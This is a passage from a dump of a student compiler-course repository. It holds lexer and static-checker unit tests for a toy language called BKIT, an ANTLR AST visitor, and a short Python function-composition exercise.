\\\\b\\\\t\\\\r\\\\n\\\\f\\\\\\\\\\\\' '\",<EOF>\"\"\"\n num=182\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_bool_op(self):\n input=\"\"\"!&&||\"\"\"\n expect=\"\"\"!,&&,||,<EOF>\"\"\"\n num=183\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_int_op(self):\n input=\"\"\"+-*\\\\% ==!=<><=>=\"\"\"\n expect=\"\"\"+,-,*,\\\\,%,==,!=,<,>,<=,>=,<EOF>\"\"\"\n num=184\n 
self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_float_op(self):\n input=\"\"\"+.-.*.\\\\=/=<.>.<=.>=.\"\"\"\n expect=\"\"\"+.,-.,*.,\\\\,=/=,<.,>.,<=.,>=.,<EOF>\"\"\"\n num=185\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_lit_op_err_char(self):\n input=\"\"\"[1+1.\\\\2]@#\"\"\"\n expect=\"\"\"[,1,+,1.,\\\\,2,],ERROR_CHAR @\"\"\"\n num=186\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_url_str(self):\n input=\"\"\"\\\"http://e-learning.hcmut.edu.vn/course/view.php?id=66830\\\"\"\"\"\n expect=\"\"\"http://e-learning.hcmut.edu.vn/course/view.php?id=66830,<EOF>\"\"\"\n num=187\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_resolution_test(self):\n input=\"\"\"this.a.b.c\"\"\"\n expect=\"\"\"this,.,a,.,b,.,c,<EOF>\"\"\"\n num=188\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_illegal_id(self):\n input=\"\"\"IllegalID\"\"\"\n expect=\"\"\"ERROR_CHAR I\"\"\"\n num=189\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_tab_in_str(self):\n input=\"\"\"\\\"with tab\\t\\\"\"\"\"\n expect=\"\"\"UNCLOSE_STRING with tab\\t\"\"\"\n num=190\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_spec_composite(self):\n input=\"\"\"{{{}}}\"\"\"\n expect=\"\"\"{,{,{,},},},<EOF>\"\"\"\n num=191\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_composite_var_with_simple_expr(self):\n input=\"\"\"a[-12][0O1]\"\"\"\n expect=\"\"\"a,[,-,12,],[,0O1,],<EOF>\"\"\"\n num=192\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_unicode_char(self):\n input=\"\"\"U+007F\"\"\"\n expect=\"\"\"ERROR_CHAR U\"\"\"\n num=193\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_more_sign_in_scientific(self):\n input=\"\"\"12e+-1\"\"\"\n expect=\"\"\"12,e,+,-,1,<EOF>\"\"\"\n num=194\n self.assertTrue(TestLexer.checkLexeme(input, expect, 
num))\n\n\n def test_zero_e_zero(self):\n input=\"\"\"000e000\"\"\"\n expect=\"\"\"000e000,<EOF>\"\"\"\n num=195\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_neg_scientific_float(self):\n input=\"\"\"12.0e-01\"\"\"\n expect=\"\"\"12.0e-01,<EOF>\"\"\"\n num=196\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_sequence_e(self):\n input=\"\"\"12000e-12-ex\"\"\"\n expect=\"\"\"12000e-12,-,ex,<EOF>\"\"\"\n num=197\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_ambigous_e(self):\n input=\"\"\"12e12e12.e1233e.e.e12\"\"\"\n expect=\"\"\"12e12,e12,.,e1233e,.,e,.,e12,<EOF>\"\"\"\n num=198\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_ambigous_hex_oct(self):\n input=\"\"\"-120x10o1o0xox012o0x12o30x1o3x012\"\"\"\n expect=\"\"\"-,120,x10o1o0xox012o0x12o30x1o3x012,<EOF>\"\"\"\n num=199\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n\n def test_ambigous_float_int(self):\n input=\"\"\"12eX0e123e210x120o12E+12e-1231\"\"\"\n expect=\"\"\"12,eX0e123e210x120o12E,+,12e-1231,<EOF>\"\"\"\n num=200\n self.assertTrue(TestLexer.checkLexeme(input, expect, num))\n\n" }, { "alpha_fraction": 0.6052431464195251, "alphanum_fraction": 0.6075227856636047, "avg_line_length": 35.0684928894043, "blob_id": "f2322b5a2010dbab5d849c2da07fc80c57caf701", "content_id": "979ca5c07bb4a20df7c70f6926ae25f99abe01c9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2632, "license_type": "no_license", "max_line_length": 118, "num_lines": 73, "path": "/AST/assignment2/src/main/bkit/astgen/ASTGeneration3.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "# class ASTGeneration(MPVisitor):\n \n# def visitProgram(self,ctx:MPParser.ProgramContext):\n# return self.visitExp(ctx.exp())\n\n# def visitExp(self,ctx:MPParser.ExpContext):\n# if ctx.ASSIGN():\n# return Binary(ctx.ASSIGN().getText(), 
self.visitTerm(ctx.term()), self.visitExp(ctx.exp()))\n# else:\n# return self.visitTerm(ctx.term())\n\n# def visitTerm(self,ctx:MPParser.TermContext):\n# if ctx.COMPARE():\n# return Binary(ctx.COMPARE().getText(), self.visitFactor(ctx.factor(0)), self.visitFactor(ctx.factor(1)))\n# else:\n# return self.visitFactor(ctx.factor(0))\n\n# def visitFactor(self,ctx:MPParser.FactorContext):\n# if ctx.ANDOR():\n# return Binary(ctx.ANDOR().getText(), self.visitFactor(ctx.factor()), self.visitOperand(ctx.operand()))\n# else:\n# return self.visitOperand(ctx.operand())\n\n# def visitOperand(self,ctx:MPParser.OperandContext):\n# if ctx.INTLIT():\n# return IntLiteral(int(ctx.INTLIT().getText()))\n\n# if ctx.BOOLIT():\n# return BoolLiteral(bool(ctx.BOOLIT().getText()))\n \n# if ctx.ID():\n# return Id(ctx.ID().getText())\n \n# return self.visitExp(ctx.exp())\n\nfrom BKITVisitor import BKITVisitor\nfrom BKITParser import BKITParser\nfrom AST import *\n\nclass ASTGeneration(BKITVisitor):\n \n def visitProgram(self,ctx:BKITParser.ProgramContext):\n return self.visitExp(ctx.exp())\n\n def visitExp(self,ctx:BKITParser.ExpContext):\n if ctx.ASSIGN():\n return Binary(ctx.ASSIGN().getText(), self.visitTerm(ctx.term()), self.visitExp(ctx.exp()))\n else:\n return self.visitTerm(ctx.term())\n\n def visitTerm(self,ctx:BKITParser.TermContext): \n if ctx.COMPARE():\n return Binary(ctx.COMPARE().getText(), self.visitFactor(ctx.factor(0)), self.visitFactor(ctx.factor(1)))\n else:\n return self.visitFactor(ctx.factor(0))\n\n def visitFactor(self,ctx:BKITParser.FactorContext):\n if ctx.ANDOR():\n return Binary(ctx.ANDOR().getText(), self.visitFactor(ctx.factor()), self.visitOperand(ctx.operand()))\n else:\n return self.visitOperand(ctx.operand())\n\n def visitOperand(self,ctx:BKITParser.OperandContext):\n if ctx.INTLIT():\n return IntLiteral(int(ctx.INTLIT().getText()))\n\n if ctx.BOOLIT():\n return BoolLiteral(bool(ctx.BOOLIT().getText()))\n \n if ctx.ID():\n return Id(ctx.ID().getText())\n \n 
return self.visitExp(ctx.exp())" }, { "alpha_fraction": 0.5865384340286255, "alphanum_fraction": 0.6195054650306702, "avg_line_length": 23.266666412353516, "blob_id": "936b1b65b9e4a452ea5d98b3ac36df6d18d645cd", "content_id": "589f01460e318ca70a73749359f5e6758c788db8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 728, "license_type": "no_license", "max_line_length": 85, "num_lines": 30, "path": "/FP/Question4.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "def double(x):\n return x * 2\n\ndef increase(x):\n return x + 1\n\ndef square(x):\n return x * x\n\n# def compose(x, *args):\n# return compose(compose(x, *args[1:]), args[0]) if len(args) > 1 else args[0](x)\n\ndef compose2(x, *args):\n from functools import reduce\n def compose(f, g):\n return lambda x : f(g(x))\n\n return reduce(compose, args)(x)\n\ndef compose(*funcs):\n def compose2func(f,g):\n return lambda x: f(g(x))\n from functools import reduce\n return reduce(lambda x,y: compose2func(x, y), funcs, lambda x: x)\n\n\nf = compose(increase, square, double) # 2*2 = 4, 4**2 = 16, 16 inc = 17\nprint(f(2))\n# print(compose(1, increase, square, double))\n# print(compose2(1, increase, square, double))\n" }, { "alpha_fraction": 0.4170035719871521, "alphanum_fraction": 0.44789838790893555, "avg_line_length": 24.767566680908203, "blob_id": "261afad741e94cdc04118b8094d1f18892b13909", "content_id": "a0c2894b6130b02898b68b66a6f880f19be0fcff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 52436, "license_type": "no_license", "max_line_length": 176, "num_lines": 2035, "path": "/Assignments/assignment3/src/test/CheckSuite.py", "repo_name": "signofthefour/PPL", "src_encoding": "UTF-8", "text": "import unittest\nfrom TestUtils import TestChecker\nfrom StaticError import *\nfrom AST import *\n# from AST_GEN_TEST import *\n\nclass CheckSuite(unittest.TestCase):\n\n def 
test_undeclared_function(self):\n \"\"\"Simple program: main\"\"\"\n input = \"\"\" Var: x,y=1;\n Function: main\n Body: \n foo();\n EndBody.\"\"\"\n expect = str(Undeclared(Function(),\"foo\"))\n self.assertTrue(TestChecker.test(input,expect,400))\n\n def test_diff_numofparam_stmt(self):\n \"\"\"Complex program\"\"\"\n input = \"\"\"Function: main \n Body:\n printStrLn();\n EndBody.\"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"printStrLn\"),[])))\n self.assertTrue(TestChecker.test(input,expect,401))\n \n def test_diff_numofparam_expr(self):\n \"\"\"More complex program\"\"\"\n input = \"\"\"Function: main \n Body:\n printStrLn(read(4));\n EndBody.\"\"\"\n expect = str(TypeMismatchInExpression(CallExpr(Id(\"read\"),[IntLiteral(4)])))\n self.assertTrue(TestChecker.test(input,expect,402))\n \n\n def test_undeclared_function_use_ast(self):\n \"\"\"Simple program: main \"\"\"\n input = Program([FuncDecl(Id(\"main\"),[],([],[\n CallExpr(Id(\"foo\"),[])]))])\n expect = str(Undeclared(Function(),\"foo\"))\n self.assertTrue(TestChecker.test(input,expect,403))\n\n def test_diff_numofparam_expr_use_ast(self):\n \"\"\"More complex program\"\"\"\n input = Program([\n FuncDecl(Id(\"main\"),[],([],[\n CallStmt(Id(\"printStrLn\"),[\n CallExpr(Id(\"read\"),[IntLiteral(4)])\n ])]))])\n expect = str(TypeMismatchInExpression(CallExpr(Id(\"read\"),[IntLiteral(4)])))\n self.assertTrue(TestChecker.test(input,expect,404))\n\n def test_diff_numofparam_stmt_use_ast(self):\n \"\"\"Complex program\"\"\"\n input = Program([\n FuncDecl(Id(\"main\"),[],([],[\n CallStmt(Id(\"printStrLn\"),[])]))])\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"printStrLn\"),[])))\n self.assertTrue(TestChecker.test(input,expect,405))\n\n def test_init_1(self):\n \"\"\"Simple program: main\"\"\"\n input = \"\"\" Var: x,y={};\n Function: main\n Body: \n foo();\n EndBody.\"\"\"\n expect = str(TypeMismatchInStatement(VarDecl(Id(\"y\"),[],ArrayLiteral([]))))\n 
self.assertTrue(TestChecker.test(input,expect,406))\n\n def test_init_2(self):\n \"\"\"Simple program: main\"\"\"\n input = \"\"\" Var: x=\"string\",y[1][2]={{1,2}};\n Function: main\n Body: \n foo();\n EndBody.\"\"\"\n expect = str(Undeclared(Function(), \"foo\"))\n self.assertTrue(TestChecker.test(input,expect,407))\n\n def test_init_3(self):\n \"\"\"Not same dimen\"\"\"\n input = \"\"\" Var: x=\"string\",y[1][2]={{1,{2}}};\n Function: main\n Body: \n foo();\n EndBody.\"\"\"\n expect = str(InvalidArrayLiteral(ArrayLiteral([IntLiteral(1),ArrayLiteral([IntLiteral(2)])])))\n self.assertTrue(TestChecker.test(input,expect,408))\n\n def test_init_4(self):\n \"\"\"Not same dimen\"\"\"\n input = \"\"\" Var: x=\"string\",y[1][2]={{{1},{2}}};\n Function: main\n Body: \n foo();\n EndBody.\"\"\"\n expect = str(InvalidArrayLiteral(ArrayLiteral([ArrayLiteral([IntLiteral(1)]),ArrayLiteral([IntLiteral(2)])])))\n self.assertTrue(TestChecker.test(input,expect,409))\n\n def test_init_5(self):\n \"\"\"Not same dimen\"\"\"\n input = \"\"\" Var: x=\"string\",y[1][2]={1,1.2};\n Function: main\n Body: \n foo();\n EndBody.\"\"\"\n expect = str(InvalidArrayLiteral(ArrayLiteral([IntLiteral(1),FloatLiteral(1.2)])))\n self.assertTrue(TestChecker.test(input,expect,410))\n \n def test_func_decl(self):\n \"\"\"Not same dimen\"\"\"\n input = \"\"\" Var: x=\"string\",y[1][2]={{1,2}};\n Function: foo\n Body:\n Return;\n EndBody.\n Function: main\n Body: \n foo();\n EndBody.\"\"\"\n expect = str(FunctionNotReturn(\"main\"))\n self.assertTrue(TestChecker.test(input,expect,411))\n \n def test_no_entry_point(self):\n input = \"\"\" Var: x=\"string\",y[1][2]={{1,2}};\n Function: foo\n Body:\n Return;\n EndBody.\"\"\"\n expect = str(NoEntryPoint())\n self.assertTrue(TestChecker.test(input,expect,412))\n \n def test_func_decl_2(self):\n input = \"\"\" Var: x=\"string\",y[1][2]={{1,2}};\n Function: main\n Parameter: x, y,x[1][2]\n Body:\n Return;\n EndBody.\"\"\"\n expect = str(Redeclared(Parameter(), 
\"x\"))\n self.assertTrue(TestChecker.test(input,expect,413))\n \n def test_func_decl_3(self):\n \"\"\"Not same dimen\"\"\"\n input = \"\"\" Var: x=\"string\",y[1][2]={{1,2}};\n Function: foo\n Body:\n Return 1;\n EndBody.\n Function: main\n Body: \n foo();\n EndBody.\"\"\"\n \n expect = str(TypeMismatchInStatement(CallStmt(Id(\"foo\"),[])))\n self.assertTrue(TestChecker.test(input,expect,414))\n\n def test_func_decl_4(self):\n \"\"\"Not same dimen\"\"\"\n input = \"\"\" Var: x=\"string\",y[1][2]={{1,2}};\n Function: foo\n Parameter: x\n Body:\n x = 1 + 2;\n Return 1;\n EndBody.\n Function: main\n Body: \n foo();\n EndBody.\"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"foo\"),[])))\n \n self.assertTrue(TestChecker.test(input,expect,415))\n \n def test_func_decl_5(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=\"string\",y[1][2]={{1,2}};\n Function: foo\n Parameter: x\n Body:\n x = 1 + 2;\n Return 1;\n EndBody.\n Function: main\n Body:\n x = 1. +. 2.;\n foo(x);\n EndBody.\"\"\"\n expect = str(TypeMismatchInStatement(Assign(Id(\"x\"),BinaryOp(\"\"\"+.\"\"\",FloatLiteral(1.0),FloatLiteral(2.0)))))\n \n self.assertTrue(TestChecker.test(input,expect,416))\n\n def test_func_decl_6(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1.2,y[1][2]={{1,2}};\n Function: foo\n Parameter: x\n Body:\n x = 1 + 2;\n Return 1;\n EndBody.\n Function: main\n Body:\n x = 1. +. 
2.;\n foo(x);\n EndBody.\"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"foo\"),[Id(\"x\")])))\n \n self.assertTrue(TestChecker.test(input,expect,417))\n\n def test_func_decl_7(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Function: foo\n Parameter: x\n Body:\n x = 1 + 2;\n Return;\n EndBody.\n Function: main\n Body:\n foo(x);\n EndBody.\"\"\"\n expect = str(FunctionNotReturn(\"main\"))\n \n self.assertTrue(TestChecker.test(input,expect,418))\n \n def test_func_decl_8(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Function: foo\n Parameter: x\n Body:\n x = 1. + 2.;\n Return;\n EndBody.\n Function: main\n Body:\n foo(x);\n EndBody.\"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\"+\"\"\",FloatLiteral(1.0),FloatLiteral(2.0))))\n \n self.assertTrue(TestChecker.test(input,expect,419))\n \n def test_func_decl_9(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Function: foo\n Parameter: x\n Body:\n x = 1. +. 
2.;\n Return;\n EndBody.\n Function: main\n Body:\n foo(x);\n EndBody.\"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"foo\"),[Id(\"x\")])))\n \n self.assertTrue(TestChecker.test(input,expect,420))\n\n def test_func_decl_10(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Function: main\n Body:\n Var: x;\n x = 1 + foo(x);\n EndBody.\n Function: foo\n Parameter: x\n Body:\n x = 1 + 2;\n Return 1;\n EndBody.\"\"\"\n expect = str(TypeCannotBeInferred(Assign(Id(\"x\"),BinaryOp(\"\"\"+\"\"\",IntLiteral(1),CallExpr(Id(\"foo\"),[Id(\"x\")])))))\n \n self.assertTrue(TestChecker.test(input,expect,421))\n \n def test_func_decl_11(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Function: main\n Body:\n Var: x = 1;\n x = 1 + foo(x);\n EndBody.\n Function: foo\n Parameter: x\n Body:\n x = 1 + 2;\n Return 1;\n EndBody.\"\"\"\n expect = str(FunctionNotReturn(\"main\"))\n self.assertTrue(TestChecker.test(input,expect,422))\n\n def test_func_decl_12(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Function: main\n Body:\n Var: x = 1;\n x = 1 + foo(x,y);\n EndBody.\n Function: foo\n Parameter: x,a[1][2]\n Body:\n x = 1 + 2;\n Return 1;\n EndBody.\"\"\"\n expect = str(FunctionNotReturn(\"main\"))\n self.assertTrue(TestChecker.test(input,expect,423))\n \n def test_func_decl_13(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Function: main\n Body:\n Var: x = 1;\n x = 1 + foo(x,y);\n EndBody.\n Function: foo\n Parameter: x,a[1][3]\n Body:\n x = 1 + 2;\n Return 1;\n EndBody.\"\"\"\n expect = str(FunctionNotReturn(\"main\"))\n self.assertTrue(TestChecker.test(input,expect,424))\n \n def test_undecl_var(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Function: main\n Body:\n Var: x = 1;\n x = 1 + foo(x,y,z);\n EndBody.\n Function: foo\n Parameter: x,a[1][3]\n 
Body:\n x = 1 + 2;\n Return 1;\n EndBody.\"\"\"\n expect = str(TypeMismatchInExpression(CallExpr(Id(\"foo\"),[Id(\"x\"),Id(\"y\"),Id(\"z\")])))\n self.assertTrue(TestChecker.test(input,expect,425))\n \n def test_call_expr(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Function: main\n Body:\n Var: x = 1;\n x = 1 + foo(x,foo(x, True));\n EndBody.\n Function: foo\n Parameter: x,y\n Body:\n x = 1 + 2;\n Return 1;\n EndBody.\"\"\"\n\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\"+\"\"\",IntLiteral(1),CallExpr(Id(\"foo\"),[Id(\"x\"),CallExpr(Id(\"foo\"),[Id(\"x\"),BooleanLiteral(True)])]))))\n\n self.assertTrue(TestChecker.test(input,expect,426))\n \n def test_call_expr_1(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Function: main\n Body:\n Var: x = 1;\n x = 1 + foo(x,foo(x, 1));\n EndBody.\n Function: foo\n Parameter: x,y\n Body:\n x = 1 + 2;\n Return 1;\n EndBody.\"\"\"\n expect = str(FunctionNotReturn(\"main\"))\n\n self.assertTrue(TestChecker.test(input,expect,427))\n \n def test_call_expr_2(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Function: main\n Parameter: main\n Body:\n Var: foo;\n foo = foo + main();\n Return 1;\n EndBody.\n Function: foo\n Parameter: x,y\n Body:\n x = 1 + 2;\n Return 1;\n EndBody.\"\"\"\n expect = str(Undeclared(Function(), \"main\"))\n\n self.assertTrue(TestChecker.test(input,expect,428))\n \n def test_redecl_global(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Var: read;\n Function: main\n Parameter: main\n Body:\n Var: foo;\n foo = foo + main();\n Return 1;\n EndBody.\n Function: foo\n Parameter: x,y\n Body:\n x = 1 + 2;\n Return 1;\n EndBody.\"\"\"\n expect = str(Redeclared(Variable(), \"read\"))\n self.assertTrue(TestChecker.test(input,expect,429))\n \n def test_return_infunc(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" 
Var: x=1,y[1][2]={{1,2}};\n Function: main\n Body:\n Var: foo;\n foo = foo + main();\n Return 1;\n EndBody.\n Function: foo\n Parameter: x,y\n Body:\n x = 1 + 2;\n Return 1;\n Return 1.1;\n EndBody.\"\"\"\n expect = str(TypeMismatchInStatement(Return(FloatLiteral(1.1))))\n self.assertTrue(TestChecker.test(input,expect,430))\n \n def test_return_in_while(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2]={{1,2}};\n Function: main\n Body:\n Var: foo;\n foo = foo + main();\n Return 1;\n EndBody.\n Function: foo\n Parameter: x,y\n Body:\n x = 1 + 2;\n While (y)\n Do\n Return 1.1;\n EndWhile.\n Return 1;\n EndBody.\"\"\"\n expect = str(TypeMismatchInStatement(Return(IntLiteral(1))))\n\n self.assertTrue(TestChecker.test(input,expect,431))\n \n def test_return_global(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2];\n Function: main\n Body:\n Var: foo;\n foo = foo + main();\n Return 1;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n x = 1 + 2;\n Return y;\n EndBody.\"\"\"\n expect = str(TypeCannotBeInferred(Return(Id(\"y\"))))\n self.assertTrue(TestChecker.test(input,expect,432))\n \n def test_return_index_expr(self):\n \"\"\"\n Var decl in function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2];\n Function: main\n Body:\n Var: foo;\n foo = foo + main();\n Return 1;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1;\n EndBody.\n Function: foo1\n Parameter: x, b[1]\n Body:\n b[foo(3) + 2] = b[y[1][1]] + 4;\n Return y;\n EndBody.\"\"\"\n expect = str()\n self.assertTrue(TestChecker.test(input,expect,433))\n \n def test_return_index_expr_1(self):\n \"\"\"\n From index op ifer type of function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2];\n Function: main\n Body:\n Var: foo;\n foo = foo + main();\n Return 1;\n EndBody.\n Function: foo1\n Parameter: x, b[1]\n Body:\n b[foo(3) + 2] = b[y[1][1]] + 4;\n Return y;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1;\n EndBody.\"\"\"\n expect = 
str()\n self.assertTrue(TestChecker.test(input,expect,434))\n \n def test_return_index_expr_2(self):\n \"\"\"\n From index op ifer type of function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2];\n Function: main\n Body:\n Var: foo;\n foo = foo + main();\n Return 1;\n EndBody.\n Function: foo1\n Parameter: x, b[1]\n Body:\n b[foo(3) + 2] = b[y[1][1]] + 4;\n Return y;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1.1;\n EndBody.\"\"\"\n expect = str(TypeMismatchInStatement(Return(FloatLiteral(1.1))))\n\n self.assertTrue(TestChecker.test(input,expect,435))\n \n def test_return_index_expr_3(self):\n \"\"\"\n From index op ifer type of function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2];\n Function: main\n Body:\n Var: foo;\n foo = foo + main();\n Return 1;\n EndBody.\n Function: foo1\n Parameter: x, b[1]\n Body:\n b[foo(3)[1][3] + 2] = b[y[1][1]] + 4;\n Return y;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return y;\n EndBody.\"\"\"\n expect = str(TypeMismatchInStatement(Return(Id(\"y\"))))\n \n self.assertTrue(TestChecker.test(input,expect,436))\n \n def test_return_index_expr_4(self):\n \"\"\"\n From index op ifer type of function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Body:\n Var: foo;\n foo = foo + main();\n Return 1;\n EndBody.\n Function: foo1\n Parameter: x, b[1]\n Body:\n b[foo(3)[1][3] + 2] = b[y[1][1]] + 4;\n Return y;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return y;\n EndBody.\"\"\"\n expect = str(TypeMismatchInStatement(Return(Id(\"y\"))))\n self.assertTrue(TestChecker.test(input,expect,437))\n \n def test_return_index_expr_5(self):\n \"\"\"\n From index op ifer type of function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Body:\n Var: foo;\n foo = foo + main();\n Return 1;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return y;\n EndBody.\n Function: foo1\n Parameter: x, b[1]\n Body:\n b[foo(3)[1][3] + 2] = b[y[1][1]] + 4;\n Return y;\n EndBody.\n \"\"\"\n 
expect = str()\n self.assertTrue(TestChecker.test(input,expect,438))\n \n def test_for_loop(self):\n \"\"\"\n From index op ifer type of function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Body:\n Var: foo;\n Var: i , x;\n For (i = 1, i <= x*x,i*i+.1.5)\n Do x=x+1;\n EndFor.\n Return 1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\"+.\"\"\",BinaryOp(\"\"\"*\"\"\",Id(\"i\"),Id(\"i\")),FloatLiteral(1.5))))\n\n self.assertTrue(TestChecker.test(input,expect,439))\n \n def test_for_loop_1(self):\n \"\"\"\n From index op ifer type of function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Body:\n Var: foo;\n Var: i , x;\n For (i = 1, i <= x*x,i*i+1)\n Do x=x+1;\n Return 1.1;\n EndFor.\n Return 1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Return(IntLiteral(1))))\n self.assertTrue(TestChecker.test(input,expect,440))\n \n def test_for_loop_2(self):\n \"\"\"\n From index op ifer type of function\n \"\"\"\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Body:\n Var: foo;\n Var: i , x;\n For (i = 1, i <= x*x,i*i+1)\n Do x=x+1;\n For (i = 1, i <= x*x,i*i+1)\n Do x=x+1;\n Return True;\n EndFor.\n Return 1.1;\n EndFor.\n Return 1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(Return(FloatLiteral(1.1))))\n\n self.assertTrue(TestChecker.test(input,expect,441))\n \n def test_return_type(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x\n Body:\n x= 1+foo(1);\n foo(1);\n Return;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(CallStmt(Id(\"foo\"),[IntLiteral(1)])))\n\n self.assertTrue(TestChecker.test(input,expect,442))\n \n def test_return_type_1(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x, y[1][3]\n Body:\n x= 1+foo(1);\n Return y;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n EndBody.\n \"\"\"\n expect = 
str(TypeCannotBeInferred(Return(Id(\"y\"))))\n\n self.assertTrue(TestChecker.test(input,expect,443))\n \n def test_return_type_2(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x, y[1][3]\n Body:\n x= 1+foo(1);\n Return y;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeCannotBeInferred(Return(Id(\"y\"))))\n\n self.assertTrue(TestChecker.test(input,expect,444))\n \n def test_return_type_3(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x, y[1][3]\n Body:\n Var: i;\n For (i = 1, i <= x*x,i*i+1)\n Do x=x+1;\n If True Then\n Return True;\n EndIf.\n EndFor.\n EndBody.\n Function: foo\n Parameter: x\n Body:\n x = 1 + main(x, y);\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInExpression(BinaryOp(\"\"\"+\"\"\",IntLiteral(1),CallExpr(Id(\"main\"),[Id(\"x\"),Id(\"y\")]))))\n\n self.assertTrue(TestChecker.test(input,expect,445))\n \n def test_return_type_4(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x, y[1][3]\n Body:\n Var: i;\n x = 1;\n If x Then\n EndIf.\n Return;\n EndBody.\n Function: foo\n Parameter: x\n Body:\n Return 1.1;\n EndBody.\n \"\"\"\n expect = str(TypeMismatchInStatement(If([(Id(\"x\"),[],[])],[])))\n\n self.assertTrue(TestChecker.test(input,expect,446))\n \n def test_return_type_5(self):\n input = \"\"\" Var: x=1,y[1][2] = {{1,2}};\n Function: main\n Parameter: x, y[1][3]\n Body:\n For (x = 1, x>1 , 0.+.1.) 
